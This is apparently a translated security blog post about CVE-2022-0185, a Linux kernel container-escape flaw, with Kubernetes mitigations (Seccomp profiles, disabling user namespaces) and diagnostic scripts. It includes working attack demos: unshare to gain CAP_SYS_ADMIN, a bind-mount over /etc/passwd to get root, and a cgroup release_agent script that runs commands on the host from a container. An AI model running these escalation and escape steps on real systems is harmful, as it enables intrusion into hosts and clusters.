High-Severity Alert: A New Container Escape Vulnerability Affecting Kubernetes

Author: 米开朗基杨, KubeSphere evangelist and cloud native addict

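On January 18, 2022, Linux maintainers and vendors found a heap buffer overflow in the legacy_parse_param function of the Filesystem Context functionality in the Linux kernel (5.1-rc1+). The vulnerability is tracked as CVE-2022-0185 and is rated high severity, with a score of 7.8.

The vulnerability allows out-of-bounds writes in kernel memory. By exploiting it, an unprivileged attacker can bypass the restrictions of any Linux namespace and escalate privileges to root. For example, an attacker who has compromised your container can escape from it and escalate privileges.

The vulnerability was introduced in Linux kernel 5.1-rc1 in March 2019. A patch released on January 18 fixes it, and all Linux users are advised to download and install the latest kernel version.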

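The vulnerability is caused by an integer underflow in the legacy_parse_param function of the Filesystem Context functionality (fs/fs_context.c). The Filesystem Context is used to create the superblock for mounting and remounting a filesystem. The superblock records the characteristics of a filesystem, such as block and file sizes, as well as any storage blocks.

Sending 4095 bytes or more of input to legacy_parse_param bypasses the input length check and leads to an out-of-bounds write, which triggers the vulnerability. An attacker can use this to write malicious data into other parts of memory, crashing the system or executing arbitrary code to escalate privileges.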
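To make the underflow concrete, here is a minimal Python sketch of how such a length check can be bypassed. It assumes the pre-patch check has the form `len > PAGE_SIZE - 2 - size`, evaluated in unsigned 64-bit arithmetic; that form, the constant names, and the function name are assumptions for illustration and are not quoted from this article or from the kernel source.

```python
PAGE_SIZE = 4096
SIZE_T_MASK = (1 << 64) - 1  # assumption: size_t is an unsigned 64-bit integer


def check_rejects(size: int, length: int) -> bool:
    """Model of `len > PAGE_SIZE - 2 - size` with unsigned wrap-around.

    `size` is the number of bytes already accumulated in the buffer and
    `length` is the size of the new option being appended.
    """
    # Once size exceeds 4094 the subtraction goes below zero and wraps
    # around to a huge unsigned value, so the check can no longer fail.
    limit = (PAGE_SIZE - 2 - size) & SIZE_T_MASK
    return length > limit


if __name__ == "__main__":
    for size in (4000, 4094, 4095):
        print(size, check_rejects(size, 200))
```

With 4000 or 4094 bytes already buffered, a 200-byte option is rejected; with 4095 bytes buffered the limit wraps around and the same option is accepted, which is the point at which writes can run past the end of the buffer.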

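The input to legacy_parse_param is supplied through the fsconfig system call, which configures the creation context of a filesystem (for example, the superblock of an ext4 filesystem).

// Use the fsconfig system call to add the NUL-terminated string pointed to by val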
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

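To use the fsconfig system call, an unprivileged user must hold at least the CAP_SYS_ADMIN capability in their current namespace. This means that being able to enter another namespace in which the user holds that capability is enough to exploit the vulnerability.

If an unprivileged user does not have CAP_SYS_ADMIN, an attacker can obtain it through the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. unshare lets a user create new namespaces, including a new user namespace, in which they hold the capabilities needed for further attacks. This technique matters a great deal in the world of Kubernetes and containers, which rely on Linux namespaces to isolate Pods: an attacker can use it in a container escape attack. Once the escape succeeds, the attacker gains full control over the host operating system and every container running on it, can go on to attack other machines on the internal network, and can even deploy malicious containers in the Kubernetes cluster.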

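The research team that found the vulnerability published exploit code and a proof of concept on GitHub on January 25.

Docker and other container runtimes apply a Seccomp profile by default, which blocks processes in a container from using dangerous system calls and so protects the Linux namespace boundary.

Seccomp (short for secure computing mode) was introduced in Linux kernel 2.6.12 (March 8, 2005). It restricted the system calls available to a process to four: read, write, _exit, and sigreturn. This original mode is an allowlist: the process may only use those four system calls on file descriptors that are already open, and if it attempts any other system call the kernel terminates it with SIGKILL or SIGSYS.

Kubernetes, however, does not apply any Seccomp or AppArmor/SELinux profile to restrict the system calls of Pods by default. That is dangerous: processes in a Pod can freely invoke dangerous system calls and wait for the chance to obtain the privileges they need (such as CAP_SYS_ADMIN) for further attacks.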
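One way to see whether a given process is actually running under Seccomp is to read the `Seccomp:` field of `/proc/<pid>/status`, where 0 means disabled, 1 means strict mode, and 2 means filter mode. The sketch below parses that field; the function name and the sample strings in the usage are made up for illustration.

```python
from typing import Optional

# Values of the "Seccomp:" field in /proc/<pid>/status
SECCOMP_MODES = {0: "disabled", 1: "strict", 2: "filter"}


def seccomp_mode(status_text: str) -> Optional[str]:
    """Return the seccomp mode named in the text of a /proc/<pid>/status file."""
    for line in status_text.splitlines():
        # "Seccomp_filters:" also exists on newer kernels; match the exact key.
        if line.startswith("Seccomp:"):
            value = int(line.split(":", 1)[1].strip())
            return SECCOMP_MODES.get(value, "unknown")
    return None  # kernel built without seccomp, or field missing


if __name__ == "__main__":
    with open("/proc/self/status") as status_file:
        print(seccomp_mode(status_file.read()))
```

Run inside a container, this would be expected to report "filter" under a runtime's default profile and "disabled" when no profile is applied.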

Let's look at a Docker example first. In a standard Docker environment the unshare command does not work, because Docker's Seccomp filter blocks the system call it uses.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Now look at a Kubernetes Pod:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

As you can see, the root user in the Pod does not have CAP_SYS_ADMIN, but we can obtain it with the unshare command.

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh
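The capability sets that pscap prints can also be checked without installing extra packages, by decoding the `CapEff` bitmask in `/proc/<pid>/status`. The sketch below is a minimal decoder; CAP_SYS_ADMIN is bit 21 in linux/capability.h, and the function names are chosen here for illustration. The mask `00000000a80425fb` used in the usage note corresponds to the fourteen capabilities listed for bash above.

```python
CAP_SYS_ADMIN = 21  # bit number of CAP_SYS_ADMIN in linux/capability.h


def effective_mask(status_text: str) -> str:
    """Extract the hexadecimal CapEff mask from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("no CapEff line found")


def has_capability(cap_mask_hex: str, cap_bit: int = CAP_SYS_ADMIN) -> bool:
    """Return True if the given capability bit is set in the mask."""
    return bool(int(cap_mask_hex, 16) & (1 << cap_bit))


if __name__ == "__main__":
    with open("/proc/self/status") as status_file:
        mask = effective_mask(status_file.read())
    print(mask, has_capability(mask))
```

For the default container set, `has_capability("00000000a80425fb")` is False; for a mask with every low bit set, such as `000001ffffffffff`, it is True, which matches the "full" entry pscap shows after unshare.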

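So what can you do with CAP_SYS_ADMIN? Here are two examples that show how it can be used to compromise a system.

The following trick escalates a regular user on the host directly to root.

First grant python3 the CAP_SYS_ADMIN capability (note that setcap cannot operate on a symlink, only on the real file).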

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create a regular user.

$ useradd test -d /home/test -m

Then switch to the regular user and change to its home directory.

$ su test
$ cd ~

Copy /etc/passwd to the current directory and change the root user's password to "password".

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# Change root:x on the first line to root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Bind-mount the modified passwd file over /etc/passwd.

# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)

$ python3 mount-passwd.py

Now for the moment of truth! Switch to the root user and enter the password "password".

$ su root
Password: 
root@coredns:/home/test#

Amazing, we have switched to root.

Let's check whether we really have root privileges:

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Yep, that's root all right.

Finally, remember to unmount /etc/passwd.

$ umount /etc/passwd

So, System Reboot Engineers, go and check right now whether the regular users you have handed out to other people have access to CAP_SYS_ADMIN.
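One way to run that check is to look for binaries that carry CAP_SYS_ADMIN as a file capability, as python3.8 does after the setcap call above. The sketch below reads the `security.capability` extended attribute and decodes the first permitted word. It assumes the on-disk layout is a little-endian `magic_etc` word followed by the low 32 bits of the permitted set, and the function names are hypothetical; getcap remains the authoritative tool.

```python
import os
import struct

CAP_SYS_ADMIN = 21  # bit number of CAP_SYS_ADMIN in linux/capability.h
XATTR_NAME = "security.capability"


def permitted_has_sys_admin(raw: bytes) -> bool:
    """Decode the start of a file-capability blob.

    Assumed layout: little-endian magic_etc, then the low 32 bits of the
    permitted set. CAP_SYS_ADMIN (bit 21) lives in that low word.
    """
    if len(raw) < 8:
        return False
    _magic_etc, permitted_low = struct.unpack_from("<II", raw)
    return bool(permitted_low & (1 << CAP_SYS_ADMIN))


def file_has_sys_admin(path: str) -> bool:
    """Return True if the file at `path` is permitted CAP_SYS_ADMIN."""
    try:
        raw = os.getxattr(path, XATTR_NAME)
    except (OSError, AttributeError):
        # No such attribute, unsupported filesystem, or a non-Linux platform.
        return False
    return permitted_has_sys_admin(raw)


if __name__ == "__main__":
    # Scan one directory; symlinks are skipped so each binary is listed once.
    for entry in os.scandir("/usr/bin"):
        if entry.is_file(follow_symlinks=False) and file_has_sys_admin(entry.path):
            print(entry.path)
```

On the host from the example, a scan like this would be expected to list /usr/bin/python3.8 until the capability is removed again.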

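Now a container example. The following trick lets you list every process running on the host from inside a container.

We don't need to run a privileged container with --privileged; that would be no fun.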

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

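Next, run the commands below inside the container. The end result is that ps aux is executed on the host and its output is saved to the /output file in the container.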

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

In the end you can see all processes running on the host from inside the container:

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

I won't explain what each of these commands means; if you're interested, work through them using the comments.
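As one illustration, the step that locates the container's filesystem on the host relies on the `upperdir=` option of the OverlayFS mount in /etc/mtab. The sketch below mirrors that sed expression in Python. The function name and the sample mount line in the usage are hypothetical, and unlike sed it stops at the first matching line.

```python
import re
from typing import Optional

# Same idea as the sed pattern: capture everything after "perdir=" up to a comma.
UPPERDIR_RE = re.compile(r"perdir=([^,]*)")


def overlay_upperdir(mtab_text: str) -> Optional[str]:
    """Return the OverlayFS upperdir path from mtab-style text, if present."""
    for line in mtab_text.splitlines():
        match = UPPERDIR_RE.search(line)
        if match:
            return match.group(1)
    return None


if __name__ == "__main__":
    with open("/etc/mtab") as mtab:
        print(overlay_upperdir(mtab.read()))
```

Given a hypothetical line such as `overlay / overlay rw,lowerdir=/l/A,upperdir=/var/lib/docker/overlay2/abc/diff,workdir=/w 0 0`, the function returns `/var/lib/docker/overlay2/abc/diff`, which is the value the script stores in host_path.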

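What is certain is that CAP_SYS_ADMIN opens up many more possibilities for an attacker, whether on the host or in a container, and especially in container environments. If for reasons beyond our control we cannot upgrade the kernel, we need to look for other solutions.

Starting with v1.22, Kubernetes can use SecurityContext to add a default Seccomp or AppArmor profile to resource objects, protecting Pods, Deployments, StatefulSets, DaemonSets, and so on. Although this feature is in Alpha at the time of writing, users can add their own Seccomp or AppArmor profile and define it in SecurityContext. For example: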

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try to obtain CAP_SYS_ADMIN with unshare.

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output shows that the unshare system call was successfully blocked, so the attacker cannot use it to mount an attack.
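To find workloads that are missing this protection, a manifest can be checked for a `seccompProfile` at either the Pod level or the container level. The sketch below works on a manifest that has already been loaded into a Python dict; the function name is hypothetical, and it looks only at the `securityContext` fields, so it does not account for legacy annotations or for defaults applied by the kubelet.

```python
from typing import Any, Dict, List


def containers_without_seccomp(pod: Dict[str, Any]) -> List[str]:
    """List containers in a Pod manifest that have no effective seccomp profile.

    A container-level seccompProfile takes precedence over the Pod-level one.
    A profile of type "Unconfined" is treated as no protection.
    """
    spec = pod.get("spec") or {}
    pod_profile = (spec.get("securityContext") or {}).get("seccompProfile")
    unprotected = []
    for container in spec.get("containers") or []:
        context = container.get("securityContext") or {}
        profile = context.get("seccompProfile", pod_profile)
        if not profile or profile.get("type") == "Unconfined":
            unprotected.append(container["name"])
    return unprotected


if __name__ == "__main__":
    protected_pod = {
        "spec": {
            "containers": [
                {
                    "name": "protected",
                    "securityContext": {"seccompProfile": {"type": "RuntimeDefault"}},
                }
            ]
        }
    }
    print(containers_without_seccomp(protected_pod))
```

For the `protected` Pod defined above the list is empty, while a Pod created with a bare `kubectl run` and no securityContext would have its container reported.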

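Another option is to disable user namespaces for unprivileged users at the host level, which does not require a reboot. On Ubuntu, for example, the following two commands take effect immediately and remain in effect after a reboot.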

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

On Red Hat family systems, the following commands achieve the same result.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
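To confirm that either setting is in place, the corresponding files under /proc/sys can be read back. The sketch below assumes the standard mapping of sysctl names to paths (`kernel.unprivileged_userns_clone` to /proc/sys/kernel/unprivileged_userns_clone, and `user.max_user_namespaces` to /proc/sys/user/max_user_namespaces); the function names are hypothetical. A missing file is treated as "not configured", since the first knob only exists on some distributions.

```python
from typing import Optional

USERNS_CLONE_PATH = "/proc/sys/kernel/unprivileged_userns_clone"
MAX_USERNS_PATH = "/proc/sys/user/max_user_namespaces"


def read_sysctl(path: str) -> Optional[str]:
    """Return the contents of a /proc/sys file, or None if it cannot be read."""
    try:
        with open(path) as sysctl_file:
            return sysctl_file.read()
    except OSError:
        return None


def user_namespaces_disabled(
    unprivileged_userns_clone: Optional[str],
    max_user_namespaces: Optional[str],
) -> bool:
    """Return True if either sysctl value is set to 0."""
    for value in (unprivileged_userns_clone, max_user_namespaces):
        if value is not None and value.strip() == "0":
            return True
    return False


if __name__ == "__main__":
    print(
        user_namespaces_disabled(
            read_sysctl(USERNS_CLONE_PATH),
            read_sysctl(MAX_USERNS_PATH),
        )
    )
```

After applying either pair of commands above, the check should print True; on an unmodified host it is expected to print False.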

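To summarize the recommendations for dealing with this vulnerability:

If your environment can accept a kernel patch and a reboot, patch or upgrade the kernel; this is the best option.
Reduce the use of privileged containers that have access to CAP_SYS_ADMIN.
For unprivileged containers, make sure a Seccomp filter is in place to block calls to unshare and reduce the risk. Docker is fine out of the box; Kubernetes needs extra work.
In the future, Seccomp profiles can be enabled for all workloads in a Kubernetes cluster. The feature is currently in Alpha and has to be turned on through a feature gate.
Disable user namespaces for unprivileged users at the host level.

Container environments are intricate, especially distributed scheduling platforms like Kubernetes. Every component has its own lifecycle and attack surface, so security risks are easily exposed, and cluster administrators must pay attention to security in every detail. In general, the security of containers depends in most cases on the security of the Linux kernel, so we need to keep a constant watch for security issues and apply the corresponding fixes as soon as possible.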

CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit
CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
Excessive Capabilities
CAP_SYS_ADMIN

